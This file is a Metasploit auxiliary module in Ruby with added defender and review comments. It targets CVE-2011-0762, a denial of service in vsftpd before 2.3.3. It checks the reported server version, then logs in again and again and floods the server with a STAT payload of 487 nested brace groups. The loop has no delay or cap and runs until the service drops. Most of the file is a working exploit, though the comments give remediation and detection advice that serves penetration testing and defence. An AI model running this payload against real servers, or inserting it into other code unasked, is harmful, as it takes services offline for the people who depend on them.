GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/ftp/vsftpd_232.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
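# Auxiliary module that tests for, and triggers, the vsftpd denial of service
# tracked as CVE-2011-0762 (BID 46617, EDB 16270) in releases before 2.3.3.
#
# Notes for defenders reading this module:
# * Remediation is an upgrade to vsftpd 2.3.3 or later; that is the boundary
#   the version comparison in #check uses.
# * The traffic consists of logged-in FTP sessions that repeat a STAT command
#   whose argument is a long, deeply nested brace/glob expression. FTP command
#   logging, or a network rule keyed on oversized or brace-heavy STAT
#   arguments, is a reasonable place to detect it.
# * #check only compares the version string the server reports.
#   NOTE(review): distribution packages often backport fixes without changing
#   that string, so an "Appears" result is an indication, not a confirmation.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, references, stability notes).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VSFTPD 2.3.2 Denial of Service',
        'Description' => %q{
          This module triggers a Denial of Service condition in the VSFTPD server in
          versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.
        },
        'Author' => [
          'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator
          'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher
          'Mana Mostaani <mana.mostaani[at]gmail.com>',
          'Maksymilian Arciemowicz' # Original EDB PoC
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '46617' ],
          [ 'CVE', '2011-0762' ],
          [ 'EDB', '16270' ]
        ],
        'DisclosureDate' => '2011-02-03',
        'Notes' => {
          # The service is expected to become unavailable while the module runs.
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
  end

  # Logs in, reads the server's STAT output and compares the reported vsFTPd
  # version against 2.3.3.
  #
  # @return [Exploit::CheckCode] Unknown when the connection, login or version
  #   lookup fails; Appears when the reported version is below 2.3.3; Safe
  #   otherwise
  def check
    begin
      # NOTE(review): a false return from connect_login is reported as
      # 'Connection refused.' although it may equally be a failed login.
      unless connect_login
        print_error('Connection refused.')
        return Exploit::CheckCode::Unknown
      end
    rescue Rex::ConnectionRefused
      print_error('Connection refused.')
      return Exploit::CheckCode::Unknown
    rescue Rex::ConnectionTimeout
      print_error('Connection timed out')
      return Exploit::CheckCode::Unknown
    end

    version_banner = /vsFTPd (\d+\.\d+\.\d+)/
    # The reply text comes from the remote server, so it must not be able to
    # keep this loop running forever: stop on a missing reply and cap the
    # number of reads. A real vsftpd STAT reply is only a handful of lines.
    max_replies = 64
    s = ''
    max_replies.times do
      # get each reply until the version line or the end-of-status line shows
      s = send_cmd(['STAT'], true)
      # send_cmd presumably returns nil when nothing is received (TODO confirm);
      # without this guard a silent peer made the loop spin indefinitely.
      break if s.nil? || s =~ version_banner || s == "211 End of status\r\n"
    end
    disconnect

    # check if version was found
    if s.nil? || s !~ version_banner
      print_error('Did not find ftp version in FTP session.')
      return Exploit::CheckCode::Unknown
    end

    # Take the digits that directly follow "vsFTPd". An unanchored
    # \d+\.\d+\.\d+ would match any earlier dotted number in the same reply
    # (for instance the start of an IPv4 address) and compare the wrong value.
    version = s[version_banner, 1]
    if Rex::Version.new(version) < Rex::Version.new('2.3.3')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Runs the denial-of-service test after #check reports the target as
  # apparently affected; aborts with Failure::NotVulnerable otherwise.
  #
  # Each pass logs in, sends the STAT command eleven times (reading only the
  # last reply) and disconnects. Only an EOFError ends the loop; timeouts,
  # resets and refused connections are reported and the loop continues.
  # NOTE(review): the loop has no delay and no iteration cap, so against a
  # target that never drops the stream it runs until the operator interrupts.
  #
  # @return [void]
  def run
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears

    # STAT argument taken from the referenced proof of concept (EDB 16270):
    # 487 nested brace groups. CVE-2011-0762 describes the effect on affected
    # releases as CPU and process-slot exhaustion while the glob is evaluated.
    payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487

    vprint_status("Payload being sent: #{payload}")
    print_status('sending payload')

    loop do
      print('.')
      connect_login
      10.times do
        send_cmd([payload.to_s], false)
      end
      send_cmd([payload.to_s], true)
      disconnect
    rescue Rex::ConnectionTimeout
      print("\n")
      print_error('Connection timeout! Sending again')
    rescue Errno::ECONNRESET
      print("\n")
      print_error('Connection reset!')
    rescue Rex::ConnectionRefused
      print("\n")
      print_good('Connection refused! Appears DOS attack succeeded.')
    rescue EOFError
      print("\n")
      print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')
      break
    end
    disconnect
  end
end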